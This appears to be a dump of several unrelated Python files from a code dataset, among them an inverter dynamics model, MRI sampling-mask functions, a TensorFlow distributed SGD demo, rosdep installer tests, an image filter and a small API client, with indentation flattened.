"""
try:
self.wgrid_measured = self.wgrid_calc(t) #Update grid frequency
#Convert PCC LV side voltage from phasor to alpha-beta domain
self.valpha = utility_functions.phasor_to_time_1phase(self.va,w=self.wgrid_measured,t=t)
self.vbeta =utility_functions.phasor_to_time_1phase(self.va*pow(math.e,-1j*(math.pi/2)),w=self.wgrid_measured,t=t)
#Convert from alpha-beta domain to d-q domain using Parks transformation
self.vd,self.vq = utility_functions.alpha_beta_to_d_q(self.valpha,self.vbeta,self.wte)
#Calculate inverter frequency from PLL equation
self.we = self.we_calc()
self.winv = self.we
except:
LogUtil.exception_handler()
def ODE_model(self,y,t):
"""System of ODE's defining the dynamic DER model.
Args:
y (list of float): Initial conditions for the states..
t (float): Simulation time in seconds.
Returns:
result (list of float): Derivates for the system of ODE's.
"""
try:
iaR, iaI, xaR, xaI, uaR, uaI, xP, xQ, xPLL, wte = y # unpack current values of y
self.update_inverter_states(iaR + 1j*iaI, xaR + 1j*xaI,uaR + 1j*uaI,
xP,xQ,
xPLL,wte)
self.update_Ppv(t)
self.update_Zload1(t)
self.update_voltages()
self.update_power()
self.update_RMS()
self.update_Qref(t)
self.update_iref(t)
self.update_inverter_frequency(t)
self.update_ridethrough_flags(t)
self.disconnect_or_reconnect(t)
#Phase a inverter output current
diaR = (1/self.Lf)*(-self.Rf*self.ia.real - self.va.real + self.vta.real) + (self.winv/self.wbase)*self.ia.imag
diaI = (1/self.Lf)*(-self.Rf*self.ia.imag - self.va.imag + self.vta.imag) - (self.winv/self.wbase)*self.ia.real
#Current controller dynamics
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign(self.Ki_GCC*self.ua.real) == np.sign(self.xa.real):
dxaR = 0.0
else:
dxaR = self.Ki_GCC*self.ua.real
if np.sign(self.Ki_GCC*self.ua.imag) == np.sign(self.xa.imag):
dxaI = 0.0
else:
dxaI = self.Ki_GCC*self.ua.imag
#six.print_(dxaR+1j*dxaI,np.sign(self.Ki_GCC*self.ua))
else:
dxaR = self.Ki_GCC*self.ua.real
dxaI = self.Ki_GCC*self.ua.imag
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign( (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)) == np.sign(self.ua.real):
duaR = 0.0
else:
duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
if np.sign((self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)) == np.sign(self.ua.imag):
duaI = 0.0
else:
duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
else:
duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
#DC link voltage dynamics
dVdc = 0.0
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(self.Ki_P*(self.Ppv -self.S.real)) == np.sign(self.xP):
dxP = 0.0
else:
dxP = self.Ki_P*(self.Ppv -self.S.real)
else:
dxP = self.Ki_P*(self.Ppv -self.S.real)
# Reactive power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(-self.Ki_Q*(self.Q_ref - self.S_PCC.imag)) == np.sign(self.xQ):
dxQ = 0.0
else:
dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
else:
dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
#SRF-PLL dynamics
dxPLL = self.Ki_PLL*(self.vd)
#Frequency integration to get angle
dwte = self.we
result = [ diaR,# list of dy/dt=f functions
diaI,
dxaR,
dxaI,
duaR,
duaI,
dxP,
dxQ,
dxPLL,
dwte]
return np.array(result)
except:
LogUtil.exception_handler()
def jac_ODE_model(self,y,t):
"""Jacobian for the system of ODE's.
Args:
y (list of float): Initial conditions for the states..
t (float): Simulation time in seconds.
Returns:
result (array of float): An array containing the elements of the Jacobian.
"""
try:
iaR, iaI, xaR, xaI, uaR, uaI,xP, xQ, xPLL, wte = y # unpack current values of y
#self.update_inverter_states(iaR,iaI,xaR,xaI,uaR,uaI,
# xP,xQ,
# xPLL,wte)
self.update_inverter_states(iaR + 1j*iaI, xaR + 1j*xaI,uaR + 1j*uaI,
xP,xQ,
xPLL,wte)
J = self.J
varInd = self.varInd
self.update_Ppv(t)
#self.update_Zload1(t)
self.update_voltages()
self.update_power()
self.update_RMS()
self.update_Qref(t)
#self.update_Vdc_ref(t)
self.update_iref(t)
#d-q transformation
self.update_inverter_frequency(t)
self.update_ridethrough_flags(t)
self.disconnect_or_reconnect(t)
#Phase a inverter output current
ra,theta_a = cmath.polar(self.va)
theta_a = self.wgrid_measured*t + theta_a - math.pi/2
J[varInd['iaR'],varInd['iaR']] = -self.Rf/self.Lf
J[varInd['iaR'],varInd['iaI']] = (self.xPLL+self.Kp_PLL*self.vd+2*math.pi*60)/self.wbase
J[varInd['iaR'],varInd['xaR']] = self.Vdc/(2*self.Lf)
J[varInd['iaR'],varInd['uaR']] = (self.Vdc*self.Kp_GCC)/(2*self.Lf)
J[varInd['iaR'],varInd['xPLL']] = self.ia.imag/self.wbase
J[varInd['iaR'],varInd['wte']] = ((self.Kp_PLL*self.ia.imag*ra)/self.wbase)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
J[varInd['iaI'],varInd['iaR']]= -(self.xPLL+self.Kp_PLL*self.vd+2*math.pi*60)/self.wbase
J[varInd['iaI'],varInd['iaI']]= -self.Rf/self.Lf
J[varInd['iaI'],varInd['xaI']]= self.Vdc/(2*self.Lf)
J[varInd['iaI'],varInd['uaI']]= (self.Vdc*self.Kp_GCC)/(2*self.Lf)
J[varInd['iaI'],varInd['xPLL']]= -self.ia.real/self.wbase
J[varInd['iaI'],varInd['wte']] = ((self.Kp_PLL*self.ia.real*ra)/self.wbase)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
#Current controller dynamics
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign(self.Ki_GCC*self.ua.real) == np.sign(self.xa.real):
J[varInd['xaR'],varInd['uaR']]=0.0
else:
J[varInd['xaR'],varInd['uaR']]=self.Ki_GCC
if np.sign(self.Ki_GCC*self.ua.imag) == np.sign(self.xa.imag):
J[varInd['xaI'],varInd['uaI']]=0.0
else:
J[varInd['xaI'],varInd['uaI']]=self.Ki_GCC
else:
J[varInd['xaR'],varInd['uaR']]=self.Ki_GCC
J[varInd['xaI'],varInd['uaI']]=self.Ki_GCC
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign( (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)) == np.sign(self.ua.real):
J[varInd['uaR'],varInd['iaR']]= 0.0
J[varInd['uaR'],varInd['uaR']]= 0.0
J[varInd['uaR'],varInd['xP']]= 0.0
else:
#duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
J[varInd['uaR'],varInd['iaR']]= -self.wp
J[varInd['uaR'],varInd['uaR']]= -self.wp
J[varInd['uaR'],varInd['xP']]= self.wp
if np.sign((self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)) == np.sign(self.ua.imag):
#duaI = 0.0
J[varInd['uaI'],varInd['iaR']]= 0.0
J[varInd['uaI'],varInd['iaI']]= 0.0
J[varInd['uaI'],varInd['uaI']]= 0.0
J[varInd['uaI'],varInd['xQ']]= 0.0
else:
#duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
J[varInd['uaI'],varInd['iaR']]= (self.Kp_Q*self.wp*self.va.imag/2)
J[varInd['uaI'],varInd['iaI']]= -self.wp - (self.Kp_Q*self.wp*self.va.real/2)
J[varInd['uaI'],varInd['uaI']]= -self.wp
J[varInd['uaI'],varInd['xQ']]= self.wp
else:
#duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
#duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
J[varInd['uaR'],varInd['iaR']]= -self.wp
J[varInd['uaR'],varInd['uaR']]= -self.wp
#J[varInd['uaR'],varInd['Vdc']]= -self.wp*self.Kp_DC
J[varInd['uaR'],varInd['xP']]= self.wp
J[varInd['uaI'],varInd['iaR']]= (self.Kp_Q*self.wp*self.va.imag/2)
J[varInd['uaI'],varInd['iaI']]= -self.wp - (self.Kp_Q*self.wp*self.va.real/2)
J[varInd['uaI'],varInd['uaI']]= -self.wp
J[varInd['uaI'],varInd['xQ']]= self.wp
#Active power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
                if np.sign(self.Ki_P*(self.Ppv - self.S.real)) == np.sign(self.xP):
#dxP = 0.0
J[varInd['xP'],varInd['iaR']]= 0.0
J[varInd['xP'],varInd['iaI']]= 0.0
else:
#dxP = self.Ki_P*(self.Ppv -self.S.real)
J[varInd['xP'],varInd['iaR']]= (self.Ki_P*self.va.imag/2)
J[varInd['xP'],varInd['iaI']]= -(self.Ki_P*self.va.real/2)
else:
#dxP = self.Ki_P*(self.Ppv -self.S.real)
J[varInd['xP'],varInd['iaR']]= (self.Ki_P*self.va.imag/2)
J[varInd['xP'],varInd['iaI']]= -(self.Ki_P*self.va.real/2)
# Reactive power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(-self.Ki_Q*(self.Q_ref - self.S_PCC.imag)) == np.sign(self.xQ):
#dxQ = 0.0
J[varInd['xQ'],varInd['iaR']]= 0.0
J[varInd['xQ'],varInd['iaI']]= 0.0
else:
#dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
J[varInd['xQ'],varInd['iaR']]= (self.Ki_Q*self.va.imag/2)
J[varInd['xQ'],varInd['iaI']]= -(self.Ki_Q*self.va.real/2)
else:
#dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
J[varInd['xQ'],varInd['iaR']]= (self.Ki_Q*self.va.imag/2)
J[varInd['xQ'],varInd['iaI']]= -(self.Ki_Q*self.va.real/2)
#SRF-PLL dynamics
#dxPLL = self.Ki_PLL*(self.vd)
J[varInd['xPLL'],varInd['wte']] = (self.Ki_PLL*ra)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
#Frequency integration to get angle
#dwte = self.we
J[varInd['wte'],varInd['xPLL']]= 1
J[varInd['wte'],varInd['wte']] = (self.Kp_PLL*ra)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
return J
except:
LogUtil.exception_handler()
| StarcoderdataPython |
6511546 | <filename>subtle_data_crimes/crime_2_jpeg/Fig7/DL/utils/sampling_funcs.py
import numpy as np
import sigpy as sp
import math
from subtle_data_crimes.functions import new_poisson
import matplotlib.pyplot as plt
# ===================== 2D Variable-density Sampling (based on <NAME>'s Sparse MRI toolbox) ============================
def create_samp_mask(R, imSize, calib=[24, 24], mask_show_flag=0):
print('gen PDF & sampling mask...')
# Here we define the variable "poly_degree", which controls the shape of the PDF.
# Strong variable density can be obtained with poly_degree =~5
# Weak variable density can be obtained with poly_degree = 50
# Extremeley weak variable density, which is almost (but not exactly) uniform random, is obtained with poly_dgree = 1000
if R == 10:
poly_degree = 4.5
elif R == 8:
poly_degree = 4
elif R == 6:
poly_degree = 3
elif R == 5:
poly_degree = 2.5
elif R == 4:
poly_degree = 2
elif R == 3:
poly_degree = 1.5
elif R == 2:
poly_degree = 1.5
elif R > 10:
poly_degree = 10 # works OK for R=6,8,10 without calib, but results are unstable
pdf = genPDF(imSize, poly_degree, 1 / R)
mask = genSampling(pdf, iter=10, tol=60, calib=calib)
# mask = np.expand_dims(mask,axis=0) # add coils dim to mask
if mask_show_flag == 1:
# display sampling mask
fig = plt.figure()
plt.imshow(mask, cmap="gray")
plt.axis('off')
plt.title('R={}'.format(R))
plt.show()
fname = 'mask_R{}'.format(R)
fig.savefig(fname=fname)
elif mask_show_flag == 2: # display mask & pdf
# display sampling mask & PDF
fig = plt.figure()
plt.imshow(np.concatenate((mask, pdf), axis=1), cmap="gray")
plt.axis('off')
plt.title('sampling mask & pdf \n R={}'.format(R))
plt.show()
fname = 'mask_and_PDF_R{}'.format(R)
fig.savefig(fname=fname)
return mask, pdf
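# Example call (illustrative; the image size and calibration region are assumptions):
# mask, pdf = create_samp_mask(R=4, imSize=np.array([256, 256]), calib=[24, 24])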
############### genPDF ###########################
def genPDF(imSize, p, pctg, distType=2, radius=0, disp=0):
# This function generates a pdf for a 1d or 2d random sampling pattern
# with polynomial variable density sampling
# Input:
# imSize - size of matrix or vector
# p - power of polynomial
# pctg - partial sampling factor e.g. 0.5 for half
# distType - 1 or 2 for L1 or L2 distance measure
# radius - radius of fully sampled center
# disp - display output
# Output:
# pdf - the pdf
# val - min sampling density
# (c) <NAME> 2007. Converted from Matlab to Python by <NAME> (2020)
minval = 0
maxval = 1
val = 0.5
if len(imSize) == 2: # 2D case
# sx = imSize(1);
# sy = imSize(2);
# PCTG = floor(pctg*sx*sy);
sx = imSize[0]
sy = imSize[1]
PCTG = np.floor(pctg * sx * sy)
x_co = np.linspace(-1, 1, sy) # coordinates
y_co = np.linspace(-1, 1, sx) # coordinates
x, y = np.meshgrid(x_co, y_co)
if distType == 1:
r = np.max(np.abs(x), np.abs(y))
else:
r = np.sqrt(x ** 2 + y ** 2)
r = r / np.max(np.abs(r.reshape(1, -1)))
elif len(imSize) == 1: # 1D case
sx = imSize[0]
r = np.abs(np.linspace(-1, 1, sx))
# create PDF
idx = np.where(r < radius)
pdf = (1 - r) ** p + val
pdf[pdf > 1] = 1
pdf[idx] = 1
while (1):
val = minval / 2 + maxval / 2
pdf = (1 - r) ** p + val
pdf[pdf > 1] = 1
pdf[idx] = 1
N = np.floor(np.sum(pdf))
if N > PCTG: # infeasible
maxval = val
if N < PCTG: # feasible, but not optimal
minval = val
if N == PCTG: # optimal
break
return pdf
############### genSampling ###########################
def genSampling(pdf, iter, tol, calib=[1, 1]):
# A monte-carlo algorithm to generate a sampling pattern with
# minimum peak interference. The number of samples will be
# sum(pdf) +- tol
#
# Inputs:
# pdf - probability density function to choose samples from
# iter - vector of min interferences measured each try
# tol - the deviation from the desired number of samples in samples
# Outputs:
# mask - sampling pattern
# (c) <NAME> 2007.
# Converted from Matlab to Python by <NAME> (2020)
# print('inside genSampling')
print('calib=', calib)
pdf[pdf > 1] = 1
K = np.sum(pdf[::])
minIntr = np.array([1e99])
minIntrVec = np.zeros(pdf.shape)
for n in range(iter):
tmp = np.zeros(pdf.shape)
while np.abs(np.sum(tmp[::]) - K) > tol:
tmp = np.random.random(pdf.shape) < pdf
TMP = np.fft.ifft2(tmp / pdf)
if np.max(np.abs(TMP[1:-1])) < minIntr:
minIntr = np.max(np.abs(TMP[1:-1]))
minIntrVec = tmp
mask = minIntrVec
# add calibration area
nx = mask.shape[-1]
ny = mask.shape[-2]
mask[int(ny / 2 - calib[-2] / 2):int(ny / 2 + calib[-2] / 2),
int(nx / 2 - calib[-1] / 2):int(nx / 2 + calib[-1] / 2)] = 1
return mask
# ############### Example for calling the above two functions: ###########################
# imSize=np.array([128,128])
# #imSize=np.array([128])
# R_wanted = 6
# pctg = 1/R_wanted
# p=3
# pdf,_ = genPDF(imSize,p,pctg)
# mask = genSampling(pdf,iter=10,tol=60)
# fig = plt.figure()
# plt.imshow(abs(pdf))
# fig = plt.figure()
# plt.imshow(mask)
| StarcoderdataPython |
9690377 | """Synchronous SGD
Author: <NAME>
"""
from __future__ import print_function
import tensorflow as tf
import argparse
import time
import os
FLAGS = None
log_dir = '/logdir'
REPLICAS_TO_AGGREGATE = 2
def main():
# Configure
config=tf.ConfigProto(log_device_placement=False)
# Server Setup
cluster = tf.train.ClusterSpec({
'ps':['localhost:2222'],
'worker':['localhost:2223','localhost:2224']
}) #allows this node know about all other nodes
if FLAGS.job_name == 'ps': #checks if parameter server
server = tf.train.Server(cluster,
job_name="ps",
task_index=FLAGS.task_index,
config=config)
server.join()
else: #it must be a worker server
is_chief = (FLAGS.task_index == 0) #checks if this is the chief node
server = tf.train.Server(cluster,
job_name="worker",
task_index=FLAGS.task_index,
config=config)
# Graph
worker_device = "/job:%s/task:%d/cpu:0" % (FLAGS.job_name,FLAGS.task_index)
with tf.device(tf.train.replica_device_setter(ps_tasks=1,
worker_device=worker_device)):
a = tf.Variable(tf.constant(0.,shape=[2]),dtype=tf.float32)
b = tf.Variable(tf.constant(0.,shape=[2]),dtype=tf.float32)
c=a+b
global_step = tf.Variable(0,dtype=tf.int32,trainable=False,name='global_step')
target = tf.constant(100.,shape=[2],dtype=tf.float32)
loss = tf.reduce_mean(tf.square(c-target))
# create an optimizer then wrap it with SyncReplicasOptimizer
optimizer = tf.train.GradientDescentOptimizer(.0001)
optimizer1 = tf.train.SyncReplicasOptimizer(optimizer,
replicas_to_aggregate=REPLICAS_TO_AGGREGATE, total_num_replicas=2)
opt = optimizer1.minimize(loss,global_step=global_step) # averages gradients
#opt = optimizer1.minimize(REPLICAS_TO_AGGREGATE*loss,
# global_step=global_step) # hackily sums gradients
# Session
sync_replicas_hook = optimizer1.make_session_run_hook(is_chief)
stop_hook = tf.train.StopAtStepHook(last_step=10)
hooks = [sync_replicas_hook,stop_hook]
# Monitored Training Session
sess = tf.train.MonitoredTrainingSession(master = server.target,
is_chief=is_chief,
config=config,
hooks=hooks,
stop_grace_period_secs=10)
print('Starting training on worker %d'%FLAGS.task_index)
while not sess.should_stop():
_,r,gs=sess.run([opt,c,global_step])
print(r,'step: ',gs,'worker: ',FLAGS.task_index)
if is_chief: time.sleep(1)
time.sleep(1)
print('Done',FLAGS.task_index)
time.sleep(10) #grace period to wait before closing session
sess.close()
print('Session from worker %d closed cleanly'%FLAGS.task_index)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Flags for defining the tf.train.ClusterSpec
parser.add_argument(
"--job_name",
type=str,
default="",
help="One of 'ps', 'worker'"
)
# Flags for defining the tf.train.Server
parser.add_argument(
"--task_index",
type=int,
default=0,
help="Index of task within the job"
)
FLAGS, unparsed = parser.parse_known_args()
print(FLAGS.task_index)
main()
| StarcoderdataPython |
193181 | # Copyright (c) 2011, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author <NAME>/<EMAIL>
import os
import traceback
try:
from unittest.mock import patch, Mock
except ImportError:
from mock import patch, Mock
def get_test_dir():
# not used yet
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'redhat'))
def test_rpm_expand_cmd():
from rosdep2.platforms.redhat import rpm_expand_cmd
m = Mock()
m.return_value = ''
# Non-macro test, should return the string unmodified
val = rpm_expand_cmd('test-string', exec_fn=m)
assert val == 'test-string', val
# Macro test, should return expanded rpm tag
with open(os.path.join(get_test_dir(), 'rpm-E-fedora'), 'r') as f:
m.return_value = f.read()
val = rpm_expand_cmd('%fedora', exec_fn=m)
assert val == '27', val
def test_rpm_detect():
from rosdep2.platforms.redhat import rpm_detect
m = Mock()
m.return_value = ''
val = rpm_detect([], exec_fn=m)
assert val == [], val
# Negative case test. rpms use devel, rather than dev
with open(os.path.join(get_test_dir(), 'rpm-q-tinyxml-dev'), 'r') as f:
m.return_value = f.read()
val = rpm_detect(['tinyxml-dev'], exec_fn=m)
assert val == [], val
# Positive case test. rpm should always be installed if you're attempting to detect rpms
with open(os.path.join(get_test_dir(), 'rpm-q-rpm'), 'r') as f:
m.return_value = f.read()
val = rpm_detect(['rpm'], exec_fn=m)
assert val == ['rpm'], val
def test_DnfInstaller():
from rosdep2.platforms.redhat import DnfInstaller
@patch.object(DnfInstaller, 'get_packages_to_install')
def test(expected_prefix, mock_method):
installer = DnfInstaller()
mock_method.return_value = []
assert [] == installer.get_install_command(['fake'])
# no interactive option with YUM
mock_method.return_value = ['a', 'b']
expected = [expected_prefix + ['dnf', '--assumeyes', '--quiet', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--quiet', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--assumeyes', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=False)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=False)
assert val == expected, val + expected
try:
with patch('rosdep2.installers.os.geteuid', return_value=1):
test(['sudo', '-H'])
with patch('rosdep2.installers.os.geteuid', return_value=0):
test([])
except AssertionError:
traceback.print_exc()
raise
def test_YumInstaller():
from rosdep2.platforms.redhat import YumInstaller
@patch.object(YumInstaller, 'get_packages_to_install')
def test(expected_prefix, mock_method):
installer = YumInstaller()
mock_method.return_value = []
assert [] == installer.get_install_command(['fake'])
# no interactive option with YUM
mock_method.return_value = ['a', 'b']
expected = [expected_prefix + ['yum', '--assumeyes', '--quiet', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--quiet', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--assumeyes', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=False)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=False)
assert val == expected, val + expected
try:
with patch('rosdep2.installers.os.geteuid', return_value=1):
test(['sudo', '-H'])
with patch('rosdep2.installers.os.geteuid', return_value=0):
test([])
except AssertionError:
traceback.print_exc()
raise
def test_Fedora_variable_installer_key():
from rosdep2 import InstallerContext
from rosdep2.platforms import pip, redhat, source
from rosdep2.platforms.redhat import DNF_INSTALLER, YUM_INSTALLER
from rospkg.os_detect import OsDetect, OS_FEDORA
os_detect_mock = Mock(spec=OsDetect)
os_detect_mock.get_name.return_value = 'fedora'
os_detect_mock.get_codename.return_value = 'twenty'
os_detect_mock.get_version.return_value = '21'
# create our test fixture. use most of the default toolchain, but
# replace the yum/dnf installer with one that we can have more fun
# with. we will do all tests with fedora keys -- other
# tests should cover different resolution cases.
context = InstallerContext(os_detect_mock)
pip.register_installers(context)
redhat.register_installers(context)
source.register_installers(context)
redhat.register_platforms(context)
assert YUM_INSTALLER == context.get_default_os_installer_key(OS_FEDORA)
os_detect_mock.get_version.return_value = '22'
assert DNF_INSTALLER == context.get_default_os_installer_key(OS_FEDORA)
def test_Fedora_variable_lookup_key():
from rosdep2 import InstallerContext
from rosdep2.platforms import pip, redhat, source
from rosdep2.platforms.redhat import DNF_INSTALLER, YUM_INSTALLER
from rospkg.os_detect import OsDetect, OS_FEDORA
os_detect_mock = Mock(spec=OsDetect)
os_detect_mock.get_name.return_value = 'fedora'
os_detect_mock.get_codename.return_value = 'heisenbug'
os_detect_mock.get_version.return_value = '20'
# create our test fixture. use most of the default toolchain, but
# replace the yum/dnf installer with one that we can have more fun
# with. we will do all tests with fedora keys -- other
# tests should cover different resolution cases.
context = InstallerContext(os_detect_mock)
pip.register_installers(context)
redhat.register_installers(context)
source.register_installers(context)
redhat.register_platforms(context)
assert ('fedora', 'heisenbug') == context.get_os_name_and_version()
os_detect_mock.get_codename.return_value = 'twenty'
os_detect_mock.get_version.return_value = '21'
assert (OS_FEDORA, '21') == context.get_os_name_and_version()
| StarcoderdataPython |
8164147 | from Cimpl import *
file = choose_file()
image = load_image(file)
def two_tone(image: Image, color1: str, color2: str) -> Image:
""" Author: <NAME>
Return an image with only two tones with specified colours from the user.
>>> image = load_image(choose_file())
>>> two_tone_image = two_tone(image, "yellow", "green")
>>> show(two_tone_image)
"""
for pixel in image:
x, y, (r, g, b) = pixel
avg_color = (r+g+b)/3
#DEFINES the colors and the number values associated (1st value in colors corresponds to the 1st color tuple of the color_values)
colors = ["black", "white", "red", "lime", "blue", "yellow", "cyan", "magenta", "gray"]
color_values = [(0,0,0), (255,255,255),(255,0,0),(0,255,0), (0,0,255), (255,255,0), (0,255,255), (255,0,255),(128,128,128)]
# Uses the colour names given by the user to determine their RGB values
for i in range(len(colors)):
if color1 == colors[i]:
c1 = color_values[i]
for i in range(len(colors)):
if color2 == colors[i]:
c2 = color_values[i]
if avg_color >= 0 and avg_color <= 127:
result = create_color(c1[0],c1[1],c1[2])
set_color(image, x, y, result)
elif avg_color >= 128 and avg_color <=255:
result = create_color(c2[0],c2[1],c2[2])
set_color(image, x, y, result)
show(image)
return image
copy_image = two_tone(image, "red", "cyan")
#copy_image2 = three_tone(image, "black", "cyan", "white")
| StarcoderdataPython |
3381391 | '''Write a program to find whether a given number is a power of 2 or not.
Output Format:
Print 'YES' or 'NO' accordingly
Example:
Input:
64
Output:
YES
Input:
48
Output:
NO
Explanation:
In the first example, 64 is a power of 2 so the answer is YES.
The second number is not a power of 2 hence the answer is NO.'''
#The Code
import math #math module for mathematical functions
n=int(input("Enter the number"))
def log2(n): #find log2 of the given number
l=math.log10(n)/math.log10(2)
return(l)
def isPower(n): #checking if a number is power of two
return (math.ceil(log2(n)) == math.floor(log2(n))) # comparison of floor and ceil values
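# Alternative check (illustrative sketch, not part of the original solution):
# a positive power of two has exactly one bit set, so `n & (n - 1) == 0`.
# def isPowerBitwise(n):
#     return n > 0 and (n & (n - 1)) == 0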
if(isPower(n)): #printing output
print("YES", end="")
else:
print("NO", end="") | StarcoderdataPython |
3498855 | class A:
x = 3
a = A()
a.x += 1
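# Note: the augmented assignment reads the class attribute A.x (3) but binds the
# result to a new *instance* attribute, so afterwards a.x == 4 while A.x stays 3.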
| StarcoderdataPython |
75050 | <gh_stars>0
from pathlib import Path
from typing import Optional, Union
from dataforseo_sdk.config import Config
from .rest_client import RestClient
class APIClient:
"""APIClient is a wrapper for the original RestClient
class provided by Data for SEO.
"""
def __init__(
self,
credentials: object,
api_version: str = "v3",
data_dir: Optional[Path] = Config.config["data_dir"],
) -> None:
"""Constructor for APIClient
Args:
credentials (object): a credentials object with username/password attributes
api_version (str, optional): the version of the Data for SEO API. Options are "v2" or "v3". Defaults to "v3".
data_dir (_type_, optional): the directory to which all responses as json files are written to and read from. Defaults to Config.config["data_dir"].
"""
self.credentials = credentials
self.api_version = api_version
self.data_dir = data_dir
self._client = None
@property
def client(self) -> RestClient:
"""A property for the http client.
Returns:
RestClient: The class that makes the http requests to the API.
"""
if not self._client:
self._client = RestClient(
self.credentials.username,
self.credentials.password,
requests_log_dir=self.data_dir,
)
return self._client
c = client
def get(self, endpoint: str) -> dict:
"""The method that makes GET HTTP requests.
Args:
endpoint (str): The URL without the api version to make the HTTP request against
Returns:
dict: A dictionary representing the json response
"""
return self.client.get(f"/{self.api_version}/{endpoint}")
def post(self, endpoint: str, data: Union[list, dict, str]) -> dict:
"""The method that makes POST HTTP requests.
Args:
endpoint (str): The URL without the api version to make the HTTP request against
data (Union[list, dict, str]): The object to pass as post data in the request
Returns:
dict: A dictionary representing the json response
"""
return self.client.post(f"/{self.api_version}/{endpoint}", data)
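# Illustrative usage (the credentials object and endpoint below are assumptions,
# not part of this module):
#     from types import SimpleNamespace
#     creds = SimpleNamespace(username="login", password="secret")
#     api = APIClient(creds)
#     ready = api.get("serp/google/organic/tasks_ready")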
| StarcoderdataPython |
349942 | from kao_decorators import proxy_for
@proxy_for('_items', ['__iter__', '__contains__', '__getitem__', 'append', 'extend'])
class ListArg:
""" Represents a list of args taht hsould be returned as a comma separated list """
def __init__(self, items=None):
""" Initialize with the items """
self._items = items if items is not None else []
def build(self):
""" Return the argument """
